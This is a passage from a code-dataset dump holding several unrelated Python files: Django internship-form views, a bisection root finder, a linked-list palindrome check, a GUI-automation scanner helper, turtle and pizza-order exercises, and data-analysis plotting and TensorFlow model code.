new_name\n\n return file\n\n\ndef create_initform(request):\n if not request.user.is_authenticated:\n messages.warning(request, \"Login First to proceed\")\n return HttpResponseRedirect(reverse(\"account:index\"))\n\n if request.method == \"POST\":\n name = request.POST[\"name\"]\n desc = request.POST[\"desc\"]\n file = request.FILES['form_file']\n content = MarkdownForm(request.POST)\n user = Account.objects.get(user=request.user)\n # Check name is already taken or not\n if Init_form.objects.filter(name=name).first():\n return render(request, 'form/create_initform.html', {\n \"fail_name\": \"This name is already taken\",\n \"content\": content\n })\n if content.is_valid():\n content = content.cleaned_data['Content']\n\n count = 0\n for x in Init_form.objects.all():\n count += 1\n filetype = file.name.split(\".\")[-1]\n time_now = datetime.datetime.now(datetime.timezone.utc)\n new_name = time_now.strftime(\n \"%d%m%y, %H%M%S\") + \"_\" + str(count) + \".\" + filetype\n file.name = new_name\n\n new_form = Init_form.objects.create(\n name=name, content=content, file=file, author=user, desc=desc, date=datetime.datetime.now(datetime.timezone.utc))\n new_form.save()\n return HttpResponseRedirect(reverse(\"form:index\"))\n else:\n content = MarkdownForm()\n return render(request, 'form/create_initform.html', {'content': content})\n\n\ndef download_file(request, file_id):\n form_field = Init_form.objects.get(id=file_id)\n # Set the return value of the HttpResponse\n response = HttpResponse(form_field.file)\n # Set the HTTP header for sending to browser\n response['Content-Disposition'] = \"attachment; filename=%s\" % form_field.filename()\n # Return the response value\n return response\n\n\ndef form(request, id):\n form = Init_form.objects.get(id=id)\n return render(request, \"form/form.html\", {'form': form})\n\n\ndef delete_form(request, form_id):\n if not request.user.is_authenticated:\n messages.warning(request, \"Login First to proceed\")\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n\n this_form = Init_form.objects.get(id=form_id)\n\n if request.user != this_form.author.user:\n return HttpResponseRedirect(reverse(\"form:form\", args=(form_id,)))\n\n this_form.delete()\n return HttpResponseRedirect(reverse(\"form:index\"))\n\n\ndef update_form(request, form_id):\n this_form = Init_form.objects.get(id=form_id)\n check_update = 1\n # Check user is own this form\n if request.user != this_form.author.user:\n return HttpResponseRedirect(reverse(\"form:form\", args=(this_form.id,)))\n\n # If user submit update form\n if request.method == \"POST\":\n form = FormForm(request.POST)\n\n if form.is_valid():\n name = form.cleaned_data['name']\n content = form.cleaned_data['content']\n desc = request.POST[\"desc\"]\n # Update This form\n this_form.name = name\n this_form.content = content\n this_form.desc = desc\n this_form.save()\n\n return HttpResponseRedirect(reverse(\"form:form\", args=(this_form.id,)))\n else:\n content = FormForm(request.POST or None, instance=this_form)\n\n return render(request, \"form/form.html\", {\n \"form\": this_form,\n \"check_update\": check_update,\n \"form_update\": content,\n })\n\n\ndef internship(request):\n\n if not request.user.is_authenticated:\n messages.warning(request, \"Login First to proceed\")\n return HttpResponseRedirect(reverse(\"account:index\"))\n\n receiver = \"admin\"\n\n account = Account.objects.get(user=request.user)\n step = account.current_state\n\n if step == 0:\n init_internship_form = Init_form.objects.get(name=\"init\")\n\n # student upload file then do\n if request.method == \"POST\":\n # need to create post to upload feedback\n file = request.FILES['form_file']\n desc = request.POST['desc']\n processed_file = generate_filename(file)\n new_form = Transmit_file.objects.create(\n file=processed_file, desc=desc, sender=account.user.username, receiver=receiver, date=datetime.datetime.now(datetime.timezone.utc))\n new_form.save()\n\n account.current_state += 1\n account.sent_box.add(new_form)\n account.save()\n\n # notify staff to sent file\n for staff in Account.objects.filter(type=\"Staff\"):\n staff.receive_box.add(new_form)\n staff.save()\n\n # recursive to proceed next step\n return HttpResponseRedirect(reverse(\"form:internship\"))\n\n return render(request, \"form/internship.html\", {\n \"step\": step,\n \"init_form\": init_internship_form\n })\n\n elif step == 1:\n\n # get form uploaded from staff\n received_file = account.receive_box\n\n # student upload file then do\n if request.method == \"POST\":\n\n # need to create post to upload feedback\n file = request.FILES['form_file']\n desc = request.POST['desc']\n processed_file = generate_filename(file)\n new_form = Transmit_file.objects.create(\n file=processed_file, desc=desc, sender=account.user.username, receiver=receiver, date=datetime.datetime.now(datetime.timezone.utc))\n new_form.save()\n\n account.current_state += 1\n account.sent_box.add(new_form)\n account.save()\n\n # notify staff to sent file\n for staff in Account.objects.filter(type=\"Staff\"):\n staff.receive_box.add(new_form)\n staff.save()\n\n # recursive to proceed next step\n return HttpResponseRedirect(reverse(\"form:internship\"))\n\n return render(request, \"form/internship.html\", {\n \"step\": step,\n \"forms\": received_file.all()\n })\n\n # uploaded all response wait for final form\n elif step == 2:\n\n # get form uploaded from staff\n received_file = account.receive_box\n\n # need reset button to reset step to 0\n\n return render(request, \"form/internship.html\", {\n \"step\": step,\n \"forms\": received_file.all()\n })\n\n return render(request, \"form/internship.html\", {\n \"step\": step\n })\n\n\ndef restart_internship(request):\n\n if not request.user.is_authenticated:\n messages.warning(request, \"Login First to proceed\")\n return HttpResponseRedirect(reverse(\"account:index\"))\n\n account = Account.objects.get(user=request.user)\n\n account.current_state = 0\n\n for o in account.sent_box.all():\n o.delete()\n account.sent_box.clear()\n\n account.read_box.clear()\n\n for o in account.receive_box.all():\n o.delete()\n account.receive_box.clear()\n account.save()\n\n return HttpResponseRedirect(reverse(\"form:internship\"))\n\n\ndef response_form(request, trans_id):\n\n if not request.user.is_authenticated:\n messages.warning(request, \"Login First to proceed\")\n return HttpResponseRedirect(reverse(\"account:index\"))\n\n account = Account.objects.get(user=request.user)\n\n transmit_file = Transmit_file.objects.get(id=trans_id)\n\n receiver_acc = Account.objects.get(\n user=User.objects.get(username=transmit_file.sender))\n\n if request.method == \"POST\":\n # need to create post to upload feedback\n file = request.FILES['form_file']\n desc = request.POST['desc']\n processed_file = generate_filename(file)\n new_form = Transmit_file.objects.create(\n file=processed_file, desc=desc, sender=account.user.username, receiver=receiver_acc.user.username, date=datetime.datetime.now(datetime.timezone.utc))\n new_form.save()\n\n account.sent_box.add(new_form)\n account.save()\n\n receiver_acc.receive_box.add(new_form)\n receiver_acc.save()\n\n return HttpResponseRedirect(reverse(\"account:index\"))\n\n return render(request, \"form/response.html\", {\n \"this_file\": transmit_file,\n \"done\": 0\n })\n","repo_name":"InternshipEngr/InternshipEngr","sub_path":"form/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33403426700","text":"## module bisection\r\n''' root = bisection(f,x1,x2,switch=0,tol=1.0e-9).\r\n Finds a root of f(x) = 0 by bisection.\r\n The root must be bracketed in (x1,x2).\r\n Setting switch = 1 returns root = None if\r\n f(x) increases upon bisection.\r\n''' \r\nimport math\r\nimport error\r\nfrom numpy import sign\r\n\r\ndef bisection(f,x1,x2,switch=1,tol=1.0e-9):\r\n f1 = f(x1)\r\n if f1 == 0.0: return x1\r\n f2 = f(x2)\r\n if f2 == 0.0: return x2\r\n if sign(f1) == sign(f2):\r\n error.err('Root is not bracketed')\r\n n = int(math.ceil(math.log(abs(x2 - x1)/tol)/math.log(2.0)))\r\n \r\n for i in range(n):\r\n x3 = 0.5*(x1 + x2); f3 = f(x3)\r\n if (switch == 1) and (abs(f3) > abs(f1)) \\\r\n and (abs(f3) > abs(f2)):\r\n return None \r\n if f3 == 0.0: return x3\r\n if sign(f2)!= sign(f3): x1 = x3; f1 = f3\r\n else: x2 = x3; f2 = f3\r\n return (x1 + x2)/2.0\r\n","repo_name":"nickcafferry/Original-Codes-from-Numerical-Methods-in-Engineering-with-Python-3","sub_path":"Book_Python_Code/Python Code/bisection.py","file_name":"bisection.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"11036143859","text":"#first to find the middle\n#then to reverse the second part\n#compare the second and old\n#reverve again\nclass Node:\n def __init__(self, value, next=None):\n self.value = value\n self.next = next\ndef is_palindromic_linked_list(head):\n fast =head\n slow = head\n #find the middle\n while fast!=None and fast.next!=None:\n fast = fast.next.next\n slow = slow.next\n #odd or even the slow.next will be the head\n second = reverse(slow)\n slow.next = second\n third =head\n while second != None and third !=None:\n if second.value == third.value:\n third =third.next\n second =second.next\n else:\n break \n firth = reverse(slow)\n slow.next = firth\n if second !=None :\n return True\n else:\n return False\ndef reverse(start):\n head = start.next\n pre = None\n cur = head\n last = head.next\n while last!=None:\n tmp = last.next\n last.next = head\n head.next =pre\n pre =head\n head = last\n last =tmp\n head.next =pre\n return head\n \ndef main():\n head = Node(2)\n head.next = Node(4)\n head.next.next = Node(6)\n head.next.next.next = Node(4)\n head.next.next.next.next = Node(2)\n\n print(\"Is palindrome: \" + str(is_palindromic_linked_list(head)))\n\n head.next.next.next.next.next = Node(2)\n print(\"Is palindrome: \" + str(is_palindromic_linked_list(head)))\n\n\nmain() \n","repo_name":"HumphreyHao/Pattern-for-python","sub_path":"fast and slow pointer/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33867276662","text":"import logging\nimport pyautogui\nimport time\nimport pandas as pd\nfrom ..navigation.essentials import scroll, move_mouse\nfrom ..navigation.navigator import navigate\nfrom ..triggers.swap import process_swap\nfrom ..tools.action_processor import check_action_kind\nfrom .blacklist_processor import check_for_blacklisted_page\nfrom ..tools.image_similarity import check_similarity\n\n\ndef page_depth_exceeds_limit(self, page_name):\n if len(page_name.split('-')) > self.max_depth:\n logging.info(f'Due to page {page_name} being deeper than max depth, it will be skipped!~yellow')\n return True\n return False\n\n\ndef adjust_scroll_position(self, image_id):\n if image_id > self.scrolls:\n scroll(self, image_id - self.scrolls)\n self.scrolls = int(image_id)\n elif image_id < self.scrolls:\n move_mouse(self, self.width // 2, self.height // 2)\n self.scrolls = 1\n pyautogui.scroll(1)\n time.sleep(self.loading_time)\n\n\ndef navigate_and_handle_errors(self, page_name, data):\n if navigate(self, path=page_name) == 'Error':\n if check_for_blacklisted_page(self, data):\n self.app_details = pd.concat([self.app_details, data], ignore_index=True)\n return True\n return False\n\n\ndef check_if_scanning_finished(self):\n for i in range(10):\n time.sleep(self.loading_time)\n if self.status == 'Alive':\n break\n if i == 9:\n if len(self.data_queue) == 0 and self.status == 'Dead':\n self.run = False\n return True\n else:\n break\n return False\n\n\ndef interact_and_verify_action(self, x1, y1, x2, y2):\n self.screenshotMaker.make_screenshot()\n current_image = self.screenshotMaker.image\n move_mouse(self, x1, y1, x2, y2, click=True, sleep=True, sleep_time=self.loading_time / 2)\n status = check_action_kind(self, current_image)\n if status == 'No action':\n move_mouse(self, x1, y1, x2, y2, click=True, sleep=True, sleep_time=self.loading_time / 2)\n status = check_action_kind(self, current_image)\n if status != 'No action':\n time.sleep(self.loading_time / 2)\n status = check_action_kind(self, current_image)\n else:\n time.sleep(self.loading_time / 2)\n status = check_action_kind(self, current_image)\n return status\n\n\ndef check_for_already_existing_page(self, images, element_parent_name):\n self.screenshotMaker.make_screenshot()\n for child, image in zip(images.keys(), images.values()):\n if check_similarity(self, image, self.screenshotMaker.image, confidence_coefficient=0.03):\n logging.info(f'Element {element_parent_name} triggered same action as {child}~pink')\n return False\n return True\n\n\ndef check_for_wrong_action_report(self, parent, status, element_parent_name):\n if '-'.join(self.current_position) != parent and status == 'New page':\n logging.info(f'Previous report about action trigger was wrong!~red')\n logging.info(f'Element {element_parent_name} triggered following action: Changed current page~pink')\n self.blacklisted_pages.append(element_parent_name)\n navigate(self, parent)\n elif '-'.join(self.current_position) != parent:\n logging.info(f'Current position: {parent} changed to '\n f'{\"-\".join(self.current_position)}~yellow')\n navigate(self, parent)\n scroll(self, self.scrolls - 1)\n","repo_name":"TrueBalkar/TrusteePlusAnalyzer","sub_path":"scanner/tools/essentials.py","file_name":"essentials.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11149024234","text":"import turtle\r\nimport random\r\n\r\ncolors = ['red', 'orange', 'yellow', 'green', 'light green', 'blue', 'purple', 'white', 'gold']\r\nscore = 0\r\n\r\n\r\ndef create_turtle(x, y, color='red', size=2, pen_color='blue', pen_size=2, heading=90, hide=False):\r\n manysturtle = turtle.Turtle()\r\n if hide:\r\n manysturtle.hideturtle()\r\n\r\n manysturtle.shape('turtle')\r\n manysturtle.color(color)\r\n manysturtle.shapesize(size)\r\n manysturtle.setheading(heading)\r\n manysturtle.pensize(pen_size)\r\n manysturtle.pencolor(pen_color)\r\n manysturtle.penup()\r\n manysturtle.goto(x, y)\r\n manysturtle.speed('fastest')\r\n\r\n return manysturtle\r\n\r\n\r\ndef draw_star(pensize, pencolor, size, color):\r\n star_turtle.pensize(pensize)\r\n star_turtle.pencolor(pencolor)\r\n\r\n star_turtle.fillcolor(color)\r\n star_turtle.begin_fill()\r\n\r\n for _ in range(5):\r\n star_turtle.forward(size)\r\n star_turtle.right(144)\r\n star_turtle.forward(size)\r\n star_turtle.left(72)\r\n\r\n star_turtle.end_fill()\r\n\r\n\r\ndef draw_random_star_in_position(x, y):\r\n pensize = random.randint(1, 8)\r\n pencolor = random.choice(colors)\r\n angle = random.randint(0, 180)\r\n star_size = random.randint(5, 60)\r\n star_color = random.choice(colors)\r\n\r\n star_turtle.penup()\r\n star_turtle.goto(x, y)\r\n star_turtle.pendown()\r\n\r\n star_turtle.setheading(angle)\r\n draw_star(pensize, pencolor, star_size, star_color)\r\n\r\n global score\r\n score += star_size + pensize\r\n draw_score(score)\r\n\r\n\r\ndef draw_score(score):\r\n score_turtle.clear()\r\n score_turtle.write('Score: ' + str(score), font=('Algerrian', 20, 'normal'))\r\n\r\n\r\nturtle.hideturtle()\r\nturtle.bgcolor('black')\r\n\r\nstar_turtle = create_turtle(0, 0, hide=True)\r\n\r\nx_max, y_max = turtle.window_width()//2, turtle.window_height()//2\r\nscore_turtle = create_turtle(-x_max + 10, y_max - 30, pen_color='white', hide=True)\r\n\r\nturtle.getscreen().onclick(draw_random_star_in_position)\r\nturtle.done()\r\n","repo_name":"jonathanqbo/moncton-python-2020","sub_path":"week7/homework/JunHuang_Task3_AddScoreIntoYourMouseclickDrawGame.py","file_name":"JunHuang_Task3_AddScoreIntoYourMouseclickDrawGame.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10490560749","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LinearSegmentedColormap\n\n\nCOLOR_MAP = {\n 'attribute': '#488A99',\n 'class': '#DBAE58',\n 'exception': '#AC3E31',\n 'function': '#484848',\n 'method': '#DADADA',\n 'repos': '#488A99',\n 'files': '#484848',\n 'corr_low': '#DADADA',\n 'corr_high': '#484848'\n}\n\n\ndef transform_df(df, imports_only=False):\n df = df.copy()\n df['repo'] = df['filename'].str.split('/').str[5]\n df['filename'] = df.apply(lambda row: row['filename'].split(row['repo'])[-1], axis=1).str[1:]\n if imports_only:\n df = df[['repo', 'filename', 'module']]\n else:\n df = df[['repo', 'filename', 'module', 'component_type', 'component_name', 'count']]\n df['library'] = df['module'].str.split('.').str[0]\n return df\n\n\ndef libraries_in_repos(df):\n df = df.drop(['module'], axis=1).drop_duplicates()\n return df.groupby('library')['repo'].nunique().reset_index().rename(columns={'repo': 'count'})\n\n\ndef libraries_in_files(df):\n df = df.drop(['module'], axis=1).drop_duplicates()\n return df.groupby('library')['filename'].nunique().reset_index().rename(columns={'filename': 'count'})\n\n\ndef modules_in_repos(df):\n return df.groupby('module')['repo'].nunique().reset_index().rename(columns={'repo': 'count'})\n\n\ndef modules_in_files(df):\n return df.groupby('module')['filename'].nunique().reset_index().rename(columns={'filename': 'count'})\n\n\ndef module_component_counts(df):\n return df.groupby(['module', 'component_type'])['count'].sum().reset_index()\n\n\ndef component_in_files(df, module):\n return df[df['module'] == module].groupby(['component_type', 'component_name'])['filename'].nunique().reset_index().rename(columns={'filename': 'count'})\n\n\ndef component_counts(df, module):\n return df[df['module'] == module].groupby(['component_type', 'component_name'])['count'].sum().reset_index()\n\n\ndef specific_component_type_in_files(df, module, component_type):\n return df[(df['module'] == module) & (df['component_type'] == component_type)].groupby('component_name')['filename'].nunique().reset_index().rename(columns={'filename': 'count'})\n\n\ndef specific_component_type_counts(df, module, component_type):\n return df[(df['module'] == module) & (df['component_type'] == component_type)].groupby('component_name')['count'].sum().reset_index()\n\n\ndef plot_popularity(df, title, top_n=None, full_count=None, files_or_repos='repos'):\n fig, ax = plt.subplots(figsize=(16, 8))\n\n if len(df.columns) == 2:\n df = df.sort_values(by='count', ascending=False).head(top_n).set_index(df.columns[0]).sort_values(by='count')\n df.plot(kind='barh', edgecolor='white', ax=ax, width=0.8, color=COLOR_MAP[files_or_repos])\n ax.get_legend().remove()\n\n elif len(df.columns) == 3:\n grouping_column = set(df.columns) & set(['module', 'library', 'component_name']).pop()\n top_n_names = df.groupby(grouping_column)['count'].sum().sort_values(ascending=False).head(top_n).index\n df = df[df[grouping_column].isin(top_n_names)]\n df = df.pivot(index=grouping_column, columns='component_type', values='count')\n df = df.loc[df.sum(axis=1).sort_values(ascending=True).index]\n df.plot(kind='barh', stacked=True, edgecolor='white', ax=ax, width=0.8, color=[COLOR_MAP[col] for col in df.columns])\n ax.legend(title='Component Type', loc='lower right')\n\n ax.set_xlim([-max(df.sum(axis=1)) * 0.08, max(df.sum(axis=1)) * 1.1])\n\n for i, total in enumerate(df.sum(axis=1)):\n if full_count:\n percentage = total / full_count * 100\n ax.text(-0.05, i, '{:1.2f}%'.format(percentage), va=\"center\", fontsize=12, ha=\"right\")\n else:\n ax.text(-0.05, i, '{:1.0f}'.format(total), va=\"center\", fontsize=12, ha=\"right\")\n\n ax.set_xlabel('')\n ax.set_ylabel('')\n ax.set_title(title, fontsize=16)\n ax.set_xticks([])\n ax.tick_params(axis='y', length=0, labelsize=12)\n \n for spine in ax.spines.values():\n spine.set_visible(False)\n \n plt.show()\n\n\ndef get_corr_table(df, index='filename', column='component_name', binary=True, top_n=24):\n if index in ('filename', 'repo') and column in ('component_name', 'module', 'library'):\n if 'count' not in df.columns:\n df['count'] = 1\n df = df[[index, column, 'count']]\n if index == 'filename':\n top = df.groupby(column)['filename'].nunique().sort_values(ascending=False).head(top_n).index\n else:\n top = df.groupby(column)['count'].sum().sort_values(ascending=False).head(top_n).index\n\n pivot_df = df[df[column].isin(top)].pivot_table(index=index, columns=column, values='count', fill_value=0)\n\n if binary:\n binary_df = pivot_df.copy()\n binary_df[binary_df > 0] = 1\n return binary_df.corr()\n else:\n return pivot_df.corr()\n \n\ndef plot_correlation_matrix(df, title):\n mask = np.triu(np.ones_like(df, dtype=bool))\n cmap = LinearSegmentedColormap.from_list(\"custom\", [COLOR_MAP['corr_low'], COLOR_MAP['corr_high']], N=256)\n\n plt.figure(figsize=(16, 16))\n ax = sns.heatmap(df, cmap=cmap, center=0, annot=True, annot_kws={'size': 12}, fmt='.2f', mask=mask, cbar=False)\n ax.set_xticklabels(ax.get_xmajorticklabels(), fontsize = 12)\n ax.set_yticklabels(ax.get_ymajorticklabels(), fontsize = 12)\n ax.tick_params(bottom=False, left=False)\n ax.set(xlabel='', ylabel='')\n plt.title(title, fontsize=16)\n plt.show()\n\n\ndef prepare_series_for_corr(s):\n df = s.reset_index()\n df.columns = ['Library', 'Correlation']\n df = round(df.iloc[1:], 2)\n return df\n\n\ndef plot_correlations(s1, s2, s3, title):\n df1 = prepare_series_for_corr(s1)\n df2 = prepare_series_for_corr(s2)\n df3 = prepare_series_for_corr(s3)\n \n fig, axs = plt.subplots(1, 3, figsize=(14, 4.5))\n for ax in axs:\n ax.axis('off')\n\n dfs = [df1, df2, df3]\n\n for i, ax in enumerate(axs):\n tbl = ax.table(cellText=dfs[i].values,\n colLabels=dfs[i].columns,\n cellLoc='center',\n loc='center')\n\n tbl.auto_set_font_size(False)\n tbl.set_fontsize(14)\n tbl.scale(1.2, 1.2)\n\n cells = [key for key in tbl.get_celld().keys()]\n for cell in cells:\n tbl.get_celld()[cell].set_edgecolor(\"grey\")\n tbl.get_celld()[cell].set_linewidth(0.5)\n\n library_title = s1.index[0] if i == 0 else (s2.index[0] if i == 1 else s3.index[0])\n ax.set_title(f'{library_title}', fontsize=16)\n\n fig.suptitle(title, fontsize=16)\n\n plt.tight_layout(rect=[0, 0, 1, 0.99])\n plt.show()\n","repo_name":"tobias-talaj/top-python-repos-analysis","sub_path":"notebooks/analysis_utils.py","file_name":"analysis_utils.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36400062491","text":"# Build an automatic pizza order program\n# use the camel naming style\n\n# prepare the basic requirements to take orders.\nprint(\"Welcome to Python Pizza Deliveries!\\nWhat will your order be?\")\n\n# take the order\nsize = input(\"What size do you want? S, M, or L\\n\")\naddPepperoni = input(\"Do you want pepperoni? Y/N\\n\")\nextraCheese = input(\"Do you want extra cheese? Y/N\\n\")\n\n# add the conditions here\nbill = 0\nif size == \"S\":\n bill = 15\nelif size == \"M\":\n bill = 20\nelif size == \"L\":\n bill = 25\n\nif addPepperoni == \"Y\":\n bill += 2\nelse:\n bill += 3\n\nif extraCheese == \"Y\":\n bill += 1\n\nprint(f\"Your bill is: ${bill}\")\n","repo_name":"Glaciux/100-days-of-Python","sub_path":"Day_3/Day_3_5.py","file_name":"Day_3_5.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25162248551","text":"import csv\nimport os\n\n\n\nwith open('./images/annotations.csv', mode='r') as csv_file:\n fieldnames = ['path', 'x1', 'y1', 'x2', 'y2', 'class']\n csv_reader = csv.DictReader(csv_file, fieldnames=fieldnames)\n line_count = 0\n img_count = 0\n file_old = \"\"\n for row in csv_reader:\n line_count = line_count + 1\n file = row[\"path\"].replace('/content/keras-retinanet/', '')\n # file = \".\"+row[\"path\"]\n if file_old != file:\n file_old = file\n img_count = img_count + 1\n if not os.path.isfile(file):\n print(\"File does not exist\", file)\n\n print(\"Number of boxes\", line_count )\n print(\"Number of images\", img_count)\n\n\n\n\n\n","repo_name":"MrFlexi/keras-retinanet","sub_path":"check_annotations.py","file_name":"check_annotations.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15825473562","text":"\"\"\"\nThis module contains base classes for git connection.\nAll concrete connectors are inherited from them.\n\"\"\"\n\nfrom typing import Optional, List, Dict\nfrom dataclasses import dataclass, asdict\nfrom abc import ABC, abstractmethod\n\n\n@dataclass\nclass GitPullRequest:\n \"\"\"\n This class represents a PR\n \"\"\"\n\n author: str\n state: str\n title: str\n url: str\n\n\nclass AbstractGitRepo(ABC):\n \"\"\"\n This class represents an abstract git repository.\n All concrete repository classes should be inherited from this.\n \"\"\"\n\n def __init__(\n self,\n owner: str,\n source: str,\n external_id: str,\n name: str,\n private: bool\n ):\n self.owner = owner\n self.source = source\n self.external_id = external_id\n self.name = name\n self.private = private\n\n @abstractmethod\n def get_pull_requests(self) -> List[GitPullRequest]:\n \"\"\"\n Fetch all PRs for this repository.\n \"\"\"\n\n raise NotImplementedError()\n\n def as_dict(self) -> Dict:\n \"\"\"\n Return normalized representation of repository, with all PRs attached.\n \"\"\"\n\n pull_requests = self.get_pull_requests()\n\n return {\n \"owner\": self.owner,\n \"source\": self.source,\n \"external_id\": self.external_id,\n \"name\": self.name,\n \"private\": self.private,\n \"pull_requests\": [asdict(pr) for pr in pull_requests]\n }\n\n\nclass AbstractGitConnector(ABC):\n \"\"\"\n This class represents an abstract git connector.\n All concrete connectors should be inherited from this.\n \"\"\"\n\n def __init__(\n self,\n username: Optional[str] = None,\n token: Optional[str] = None\n ):\n self.username = username\n self.token = token\n\n @abstractmethod\n def get_repos(self) -> List[AbstractGitRepo]:\n \"\"\"\n Fetch all repositories for this git connection.\n \"\"\"\n\n raise NotImplementedError()\n","repo_name":"markmzhachikh/git-etl-assignment","sub_path":"dependencies/git_connectors/abstract_git_connector.py","file_name":"abstract_git_connector.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21207943082","text":"# the training steps are commented out since it requires quite a lot of GPU memory!!\n\nimport tensorflow as tf\nimport tensorflow.keras\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport data_vectorizer\n# import data_vectorizer_tf\n\nclass Model(tf.keras.Model):\n def __init__(self, zero_to_one_ratio, training_initial_sample_size=1000, steps_per_epoch=50):\n super(Model, self).__init__()\n\n self.zero_to_one_ratio = zero_to_one_ratio\n self.training_initial_sample_size = training_initial_sample_size\n self.steps_per_epoch = steps_per_epoch\n\n # define layers here, input is (batch_size, string_sequence_length)\n # initial embedding layers. in below, we evaluate this with ragged tensors input (on second axis (1))\n word_dict_size = len(data_vectorizer.word_freqs_filtered)\n self.content_title_embedding = tf.keras.layers.Embedding(word_dict_size, 30)\n self.content_description_embedding = tf.keras.layers.Embedding(word_dict_size, 30)\n self.topic_title_embedding = tf.keras.layers.Embedding(word_dict_size, 30)\n self.topic_description_embedding = tf.keras.layers.Embedding(word_dict_size, 30)\n\n # concatenation layer\n self.concat_layer = tf.keras.layers.Concatenate(axis=1)\n\n # standard stuff\n self.relu1 = tf.keras.layers.Activation('relu')\n self.dense1 = tf.keras.layers.Dense(units=30, activation=\"relu\")\n self.dense2 = tf.keras.layers.Dense(units=30, activation=\"relu\")\n self.dense3 = tf.keras.layers.Dense(units=1, activation=\"sigmoid\")\n\n # loss functions and eval metrics\n self.accuracy = tf.keras.metrics.BinaryAccuracy(name=\"accuracy\")\n self.precision = tf.keras.metrics.Precision(name=\"precision\")\n self.recall = tf.keras.metrics.Recall(name=\"recall\")\n self.entropy = tf.keras.metrics.BinaryCrossentropy(name=\"entropy\")\n\n # metrics for test set\n self.full_accuracy = tf.keras.metrics.BinaryAccuracy(name=\"full_accuracy\", threshold=0.7)\n self.full_precision = tf.keras.metrics.Precision(name=\"full_precision\", thresholds=0.7)\n self.full_recall = tf.keras.metrics.Recall(name=\"full_recall\", thresholds=0.7)\n self.test_precision = tf.keras.metrics.Precision(name=\"test_precision\", thresholds=0.7)\n self.test_recall = tf.keras.metrics.Recall(name=\"test_recall\", thresholds=0.7)\n\n self.num_step = 0\n\n def compile(self):\n super(Model, self).compile(run_eagerly=True)\n # loss and optimizer\n self.loss = tf.keras.losses.BinaryCrossentropy()\n self.optimizer = tf.keras.optimizers.Adam(learning_rate=0.00025)\n\n def call(self, mdata):\n content_title, content_description, topic_title, topic_description = mdata\n t1 = tf.math.reduce_sum(self.content_title_embedding(content_title), axis=1)\n t2 = tf.math.reduce_sum(self.content_description_embedding(content_description), axis=1)\n t3 = tf.math.reduce_sum(self.topic_title_embedding(topic_title), axis=1)\n t4 = tf.math.reduce_sum(self.topic_description_embedding(topic_description), axis=1)\n\n embedding_result = self.concat_layer([t1, t2, t3, t4])\n return self.dense3(self.dense2(self.dense1(self.relu1(embedding_result))))\n\n \"\"\"def obtain_tensor_values(self, initial_sample_size=1000, zero_to_one_ratio=None):\n contents_list, topics_list, correlations = data_vectorizer.random_train_batch_sample(\n initial_sample_size=initial_sample_size, zero_to_one_ratio=zero_to_one_ratio)\n\n contents_strings = data_vectorizer.obtain_contents_vector(list(contents_list))\n topics_strings = data_vectorizer.obtain_topics_vector(list(topics_list))\n\n content_title = tf.ragged.constant(list(contents_strings[\"title_translate\"]))\n content_description = tf.ragged.constant(list(contents_strings[\"description_translate\"]))\n topic_title = tf.ragged.constant(list(topics_strings[\"title_translate\"]))\n topic_description = tf.ragged.constant(list(topics_strings[\"description_translate\"]))\n\n y = tf.constant(correlations)\n\n return content_title, content_description, topic_title, topic_description, y\n\n def obtain_tensor_values2(self, initial_sample_size=1000, zero_to_one_ratio=None):\n contents_list, topics_list, correlations = data_vectorizer_tf.random_train_batch_sample(\n initial_sample_size=initial_sample_size, zero_to_one_ratio=zero_to_one_ratio)\n\n contents_strings = data_vectorizer_tf.obtain_train_contents_vector(contents_list)\n topics_strings = data_vectorizer_tf.obtain_train_topics_vector(topics_list)\n\n content_title, content_description = contents_strings\n topic_title, topic_description = topics_strings\n\n y = tf.constant(correlations)\n\n return content_title, content_description, topic_title, topic_description, y\n\n def obtain_test_values(self, initial_sample_size=1000, zero_to_one_ratio=None):\n contents_list, topics_list, correlations = data_vectorizer_tf.random_test_batch_sample(\n initial_sample_size=initial_sample_size, zero_to_one_ratio=zero_to_one_ratio)\n\n contents_strings = data_vectorizer_tf.obtain_train_contents_vector(contents_list)\n topics_strings = data_vectorizer_tf.obtain_train_topics_vector(topics_list)\n\n content_title, content_description = contents_strings\n topic_title, topic_description = topics_strings\n\n y = tf.constant(correlations)\n\n return content_title, content_description, topic_title, topic_description, y\n\n def train_step(self, data):\n # feedforward + backpropragation with training set\n if self.zero_to_one_ratio < 100:\n content_title, content_description, topic_title, topic_description, y = self.obtain_tensor_values(\n self.training_initial_sample_size, self.zero_to_one_ratio)\n else:\n content_title, content_description, topic_title, topic_description, y = self.obtain_tensor_values2(\n self.training_initial_sample_size, self.zero_to_one_ratio)\n\n with tf.GradientTape() as tape:\n y_pred = self((content_title, content_description, topic_title, topic_description))\n loss = self.loss(y, y_pred)\n\n trainable_vars = self.trainable_weights\n gradients = tape.gradient(loss, trainable_vars)\n\n self.optimizer.apply_gradients(zip(gradients, trainable_vars))\n\n for m in self.metrics:\n m.update_state(y, y_pred)\n\n # feedforward with test set for metrics\n if self.num_step % self.steps_per_epoch == 0:\n content_title, content_description, 